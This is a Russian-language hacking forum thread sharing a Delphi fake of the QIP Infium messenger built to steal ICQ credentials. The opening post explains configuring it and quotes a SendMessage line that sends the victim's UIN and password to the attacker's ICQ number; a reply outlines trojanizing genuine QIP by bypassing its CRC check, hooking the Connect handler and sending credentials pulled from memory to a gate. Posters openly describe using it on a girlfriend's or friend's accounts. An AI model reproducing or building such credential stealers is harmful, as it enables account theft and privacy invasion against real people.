![]() |
Фейк QIP'a_Infium [Delphi]
Фейк QIP'a_Infium для взлома Выкладываю фейк QIP_Infium. Все нестандартные компоненты в архиве. Редактируйте на свой вкус. (Сделан как и Фейк Mail@Агент ). Минус только в том, что я не нашел нормальной иконки QIP'a Infium, так что если у кого найдется, пусть выложит иконку сюда и не смог сделать что-бы место для ввода паролей выводило кружочки, получились только '*'. В общем юзайте :) Help в архиве В компоненте icqclient (Object Inspector) укажите другой номер и пароль, записав в UIN и Password - это номер с которого будет слаться отчёт. А в строке icqclient1.SendMessage(368368456, 'ICQ: ' + ComboBox1.Text + ' Password: ' + Edit2.Text); 368368456 - это на какой номер оташлется отчет. Ссылка для скачивания |
я его уже кажись выкладывал давно или это полный с окном коннекта и чатом?
|
Не, это мой. Сегодня написал, а на свой ссылку дай если помнишь
|
http://forum.inattack.ru/index.php?showtopic=10798&st=0&gopid=97474&
|
Не, у меня просто окно фейк. А че то я скачать не могу...
|
А вообще если нормально делать, то лучше (НА примере обычной Qip)
1) Снимаешь проверку Crc 2) через декомпилятор смотришь адрес обработчика нажатия на кнопку Подключиться и пербиваешь свой обработчик. 3) приделываешь к Qip небольшой код который выдерит логин и пас из оперативы и отошлет на гейт. и обратно возвращаешься на код обработчика Больше ничего не нужно и всё будет пахать на ура. Да и максимум на создание такого твариния потратится пол дня (если конечно ассемблер знаешь (\\\ехидно улыбнулся\\)) |
Зная Delphi, Pascal, C++, HTML, PHP, но ассемблер не знаю. Скоро на Delphi закончу
|
slesh прям мои мысли читаешь :)
|
Имхо, сама идея с фейками (мейл-агент, квип и т.д.) нереентабельна. Человек, дорожащий своей информацией или владеющий красивым 5-6 знаком, будет скачивать квип только с офф. сайта. /а мейл-агенту вообще место в биореакторе/
|
Программа предназначина для взлома мыла/аси девушки или просто над другом поприкалываться. Да, ты прав, тут ты 5* не выловишь
|
| Время: 09:42 |